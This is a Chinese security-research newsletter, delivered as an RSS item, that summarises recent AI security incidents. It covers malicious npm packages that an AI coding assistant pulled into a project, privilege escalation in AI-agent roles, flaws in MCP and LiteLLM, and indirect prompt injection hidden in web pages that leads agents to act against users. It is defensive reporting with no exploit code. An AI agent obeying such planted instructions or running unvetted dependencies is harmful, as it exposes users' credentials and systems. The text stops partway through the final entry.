<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>M01N Team</title>
    <link>https://wechat2rss.xlab.app/feed/059ae07ca76f11c6e9f9fad7698ab205b3b039c8.xml</link>
    <description>研战一体，以攻促防，共筑网络安全未来！&#xA;(wechat feed made by @ttttmr https://wechat2rss.xlab.app)</description>
    <managingEditor> (M01N Team)</managingEditor>
    <pubDate>Tue, 12 May 2026 18:00:11 +0800</pubDate>
    <lastBuildDate>Tue, 12 May 2026 18:00:11 +0800</lastBuildDate>
    <image>
      <url>https://wx.qlogo.cn/mmhead/Q3auHgzwzM7uERcmjBkGVib8AMWSKro7Df5WQVQcRsb8cibRD823fTRg/0</url>
      <title>M01N Team</title>
      <link>https://wechat2rss.xlab.app/feed/059ae07ca76f11c6e9f9fad7698ab205b3b039c8.xml</link>
    </image>
    <item>
      <title>AISS社区｜Top5安全事件与技术案例解析</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247495038&amp;idx=1&amp;sn=bdf03f33bc9acdfd1d516ad02b691d1d</link>
      <description>本期从AISS案例库250+个入库案例中，精选近期最具代表性的10个事件与技术案例</description>
      <content:encoded><![CDATA[<p>原创 <span>天元实验室</span> <span>2026-05-12 18:00</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=34f27e4d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FTPGibEO8KBwasInfGT2H4qxCiam76dFfIM55dQIaaTtzZ45ibWlzx59tU2Lf6k7VqMSPkcXftk5icXl72RFGeXTJQg%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>本期从AISS案例库250+个入库案例中，精选近期最具代表性的10个事件与技术案例</p>
  <div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="display: flex;flex-flow: row;margin: 7px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;width: 20px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;background-color: rgb(67, 146, 117);box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011386" src="https://wechat2rss.xlab.app/img-proxy/?k=86ce9bf5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FuZT6kWW1jCmGFwUv34WxZRazaMT3YibhkRwF5bOWknXfhAFJK0zndzmJvNicWesHRDdwEtAdLZibB6wyFe0KTAgXPl7KhHsF8TXhxhqBmv8e4I%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="font-size: 20px;line-height: 1;letter-spacing: 1px;padding: 0px 8px;text-align: justify;color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">概述</span></b></p></div></div></div><div style="display: flex;flex-flow: row;margin: 0px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 3px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;border-bottom: 3px solid rgb(67, 146, 117);border-bottom-right-radius: 0px;padding: 0px 10px 10px 20px;box-sizing: border-box;"><div style="color: rgb(106, 106, 106);line-height: 1.8;letter-spacing: 1px;padding: 0px;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">本期从AISS案例库250+个入库案例中，精选近期最具代表性的10个事件与技术案例，覆盖供应链攻击、身份安全、提示注入、协议漏洞四个核心方向。所选案例均来自在野发生或公开披露的真实事件，涵盖国内外主流AI平台、开源框架及企业部署场景，附有风险矩阵映射与阶段标注，便于快速定位威胁所在的攻击面与防御优先级。</span></p></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">01 </span></span><span leaf="">本期趋势</span></strong></p></div></div></div></div><ol style="list-style-type: decimal;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-1"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-weight: bold;">AI供应链攻击升级：</span>攻击者开始用AI生成高质量恶意代码，使恶意包与正常开源项目几乎无法区分，传统检测体系正在失效。</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-weight: bold;">Agent成为新攻击入口：</span>攻击目标正从应用本身转向Agent执行链，通过工具调用和流程控制实现系统级入侵。</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-weight: bold;">身份与权限成为核心风险：</span>Shadow AI与Agent角色越权频发，说明AI系统正在被“身份层”而不是“代码层”突破。</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-weight: bold;">上下文污染取代传统提示注入：</span>攻击已从单点提示注入，演化为通过网页、数据源持续污染Agent决策过程。</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-weight: bold;">AI基础设施漏洞在野化加速：</span>MCP、AI中间件和Agent SDK漏洞在披露后极短时间内即被利用，补丁窗口正在收缩。</span></p></li></ol><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">02 </span></span><span leaf="">与社区风险矩阵映射</span></strong></p></div></div></div></div><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">应用安全（4）· 供应链攻击 / 提示注入 / 在野利用 / Agent安全</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">身份安全（2）· 特权升级 / AI身份冒用</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">模型安全（1）· MCP协议架构漏洞</span></p></li></ul><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">完整威胁分类，可在社区主页查看。</span></p><div style="text-align: center;font-size: 12px;color: rgb(160, 160, 160);box-sizing: border-box;"><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1.070528967254408" data-s="300,640" data-type="png" data-w="794" type="block" data-imgfileid="100011389" src="https://wechat2rss.xlab.app/img-proxy/?k=98128d85&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FuZT6kWW1jCndgJu5B1eWERUjDJ2icJ6iclFq1axICoF374WjvJhkhc3RtbcA8Gqao9ibeFs7PHToNgxUYvzn96fWync6EAHteRBjwYboCpTnIQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-weight: normal;">AISS大模型安全智链社区案例库</span></span></strong></p></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">03 安全事件 TOP 5</span></span></strong></p></div></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 70%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">朝鲜黑客利用AI编写恶意npm包渗透Claude供应链</span></strong></p></div></div><div style="display: inline-block;width: 30%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="text-align: right;color: rgb(67, 146, 117);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">【应用阶段】</span></strong></p></div></div></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">朝鲜APT组织Famous Chollima利用生成式AI编写恶意npm包，代码规范、注释完整，与正常开源包几乎无法区分。通过两层依赖结构潜入项目，Claude Opus在协助提交代码时将其引入，导致敏感凭证外泄。ReversingLabs追踪该行动长达7个月，累计发现60余个恶意包、300余个版本，活动至今未停止。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AI生成恶意代码已突破现有静态检测体系的识别边界。当AI编写的代码质量本身成为伪装手段，基于规则的供应链审查逻辑需要从底层重构。</span></p></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(160, 160, 160);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(170, 169, 169);font-size: 14px;line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">收录于AISS案例库 → 应用安全 · 供应链攻击 · <a class="wx_topic_link" topic-id="mp1zd7z9-6g7szr" style="color: #576B95 !important;" data-topic="1" data-recommend="">#251</a></span></p></div></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: 70%;align-self: flex-start;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Shadow AI引发Vercel数据泄露事件  </span></strong></p></div></div><div style="display: inline-block;vertical-align: top;width: 30%;align-self: flex-start;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="text-align: right;color: rgb(67, 146, 117);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">【应用阶段】</span></strong></p></div></div></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Vercel员工私自接入第三方AI工具Context.ai，未经安全审批。Context.ai遭Lumma Stealer攻破后，攻击者借助OAuth授权链横向渗透至Vercel内部环境，API密钥、数据库凭证等敏感数据外泄。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Shadow AI的风险不在于工具本身，而在于它绕过了企业现有的安全管控边界。一个员工的未授权接入，足以成为整条攻击链的起点。</span></p></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(160, 160, 160);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(170, 169, 169);font-size: 14px;line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">收录于AISS案例库 → 应用安全 · 供应链攻击 · <a class="wx_topic_link" topic-id="mp1zd7z9-f9hsya" style="color: #576B95 !important;" data-topic="1" data-recommend="">#254</a></span></p></div></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: 70%;align-self: flex-start;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Microsoft Entra ID AI代理角色权限越界漏洞 </span></strong></p></div></div><div style="display: inline-block;vertical-align: top;width: 30%;align-self: flex-start;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="text-align: right;color: rgb(67, 146, 117);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">【应用阶段】</span></strong></p></div></div></div><div style="box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">微软修复Entra ID中&#34;Agent ID Administrator&#34;角色的权限边界缺陷，该角色原本仅用于管理AI代理，但实际可被用于接管普通服务账户，实现跨资源特权升级。漏洞于2026年4月9日完成修复。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AI代理的身份权限体系尚不成熟，新角色在设计阶段往往缺乏足够的权限隔离验证。随着企业Agent部署规模扩大，身份安全将成为持续暴露的攻击面。</span></p></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(160, 160, 160);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(170, 169, 169);font-size: 14px;line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">收录于AISS案例库 → 身份安全 · 特权升级 · <a class="wx_topic_link" topic-id="mp1zd7z9-v7kh3h" style="color: #576B95 !important;" data-topic="1" data-recommend="">#255</a></span></p></div></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: 70%;align-self: flex-start;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">LiteLLM SQL注入漏洞披露36小时内遭在野利用  </span></strong></p></div></div><div style="display: inline-block;vertical-align: top;width: 30%;align-self: flex-start;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="text-align: right;color: rgb(67, 146, 117);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">【部署阶段】</span></strong></p></div></div></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">LiteLLM作为主流LLM API代理中间件，其SQL注入漏洞（CVE-2026-42208）在公开披露后仅不足48小时内即被攻击者利用，数据库数据遭到读取与篡改。攻击通过构造特制Authorization Header实现，影响范围覆盖所有依赖LiteLLM路由的AI中间件部署。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AI基础设施组件的漏洞响应窗口已极度压缩。对于核心中间件，漏洞披露即意味着暴露，补丁优先级需等同于生产事故处理。</span></p></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(160, 160, 160);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(170, 169, 169);font-size: 14px;line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">收录于AISS案例库 → 应用安全 · 在野利用 · <a class="wx_topic_link" topic-id="mp1zd7z9-v54mvb" style="color: #576B95 !important;" data-topic="1" data-recommend="">#250</a></span></p></div></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: 70%;align-self: flex-start;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">AI数字人仿冒名人直播带货，当事人被行政拘留</span></strong></p></div></div><div style="display: inline-block;vertical-align: top;width: 30%;align-self: flex-start;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="text-align: right;color: rgb(67, 146, 117);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">【应用阶段】</span></strong></p></div></div></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">山西网民未经授权，利用AI工具生成名人AI数字人形象及带货文案，在社交平台直播带货，借助名人效应引流牟利，造成恶劣社会影响，依法被行政拘留。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">这是国内较早一批进入执法程序并有明确处罚结果的AI深度伪造案例。AI身份冒用的法律边界正在通过具体案例逐步清晰，合规风险已从模糊地带走向实质约束。</span></p></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(160, 160, 160);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(170, 169, 169);font-size: 14px;line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">收录于AISS案例库 → 身份安全 · AI身份冒用 · <a class="wx_topic_link" topic-id="mp1zd7z9-70lwac" style="color: #576B95 !important;" data-topic="1" data-recommend="">#257</a></span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">04 技术案例 TOP 5</span></span></strong></p></div></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: 70%;align-self: flex-start;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Anthropic MCP SDK架构级RCE漏洞，逾20万实例暴露  </span></strong></p></div></div><div style="display: inline-block;vertical-align: top;width: 30%;align-self: flex-start;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="text-align: right;color: rgb(67, 146, 117);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">【应用阶段】</span></strong></p></div></div></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">OX Security披露Anthropic官方MCP SDK存在架构设计层面缺陷，Python、TypeScript、Java、Rust全语言实现均受影响。STDIO接口在执行命令时不校验进程是否成功启动，攻击者传入恶意命令即可触发任意代码执行。Cursor、VS Code、Claude Code、Gemini-CLI均受波及，Windsurf（CVE-2026-30615）为唯一零点击利用场景。暴露实例估计超20万，目前官方完整修复尚未发布。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">该漏洞属于协议设计缺陷而非实现错误，意味着所有基于官方SDK构建的下游项目均继承了这一风险面，MCP生态的安全基线需要在协议层面重新设定。</span></p></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(160, 160, 160);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(170, 169, 169);font-size: 14px;line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">收录于AISS案例库 → 模型安全 · MCP协议 · <a class="wx_topic_link" topic-id="mp1zd7z9-echwjg" style="color: #576B95 !important;" data-topic="1" data-recommend="">#274</a></span></p></div></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: 70%;align-self: flex-start;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Azure AI Foundry M365 Agent特权升级漏洞（CVE-2026-35435）</span></strong></p></div></div><div style="display: inline-block;vertical-align: top;width: 30%;align-self: flex-start;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="text-align: right;color: rgb(67, 146, 117);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">【应用阶段】</span></strong></p></div></div></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2026年5月7日披露，Azure AI Foundry中已发布的M365 Agent存在访问控制缺陷，攻击者可通过网络远程绕过权限限制，从低权限角色升级为对AI资源及M365环境具有广泛控制权的高权限身份。CVSS评分8.6，目前补丁尚未发布。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AI与企业生产力套件的深度集成，正在创造新的高价值攻击入口。Agent所继承的权限范围越广，被利用的爆炸半径就越大。</span></p></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(160, 160, 160);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(170, 169, 169);font-size: 14px;line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">收录于AISS案例库 → 身份安全 · 特权升级 · <a class="wx_topic_link" topic-id="mp1zd7z9-tu39pc" style="color: #576B95 !important;" data-topic="1" data-recommend="">#275</a></span></p></div></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: 70%;align-self: flex-start;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Google披露：间接提示注入攻击已进入规模化在野阶段  </span></strong></p></div></div><div style="display: inline-block;vertical-align: top;width: 30%;align-self: flex-start;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="text-align: right;color: rgb(67, 146, 117);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">【应用阶段】</span></strong></p></div></div></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Google安全团队对CommonCrawl数十亿网页进行扫描，系统性分析了公开Web中的间接提示注入（IPI）攻击态势。攻击者将恶意指令隐藏在普通网页中，当AI Agent读取内容时被触发，从而诱导其执行违背用户意图的操作。2025年11月至2026年2月期间，Google扫描公开网络发现，恶意类IPI检测数量相对增长32%。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">IPI攻击的规模化意味着，所有具备外部内容读取能力的AI Agent，都必须将输入视为潜在攻击载体。数据与指令边界的持续模糊，已成为当前Agent架构中最难解决的结构性安全问题。</span></p></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(160, 160, 160);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(170, 169, 169);font-size: 14px;line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">收录于AISS案例库 → 应用安全 · 提示注入 · <a class="wx_topic_link" topic-id="mp1zd7z9-ln46wy" style="color: #576B95 !important;" data-topic="1" data-recommend="">#256</a></span></p></div></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: 70%;align-self: flex-start;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Hermes Agent遭RCE攻击，首次观察到Agent自主防御行为  </span></strong></p></div></div><div style="display: inline-block;vertical-align: top;width: 30%;align-self: flex-start;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="text-align: right;color: rgb(67, 146, 117);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">【应用阶段】</span></strong></p></div></div></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Hermes Agent的Twilio短信 webhook 端点未验证 X-Twilio-Signature 签名，攻击者可伪造短信触发任意命令执行（CVSS 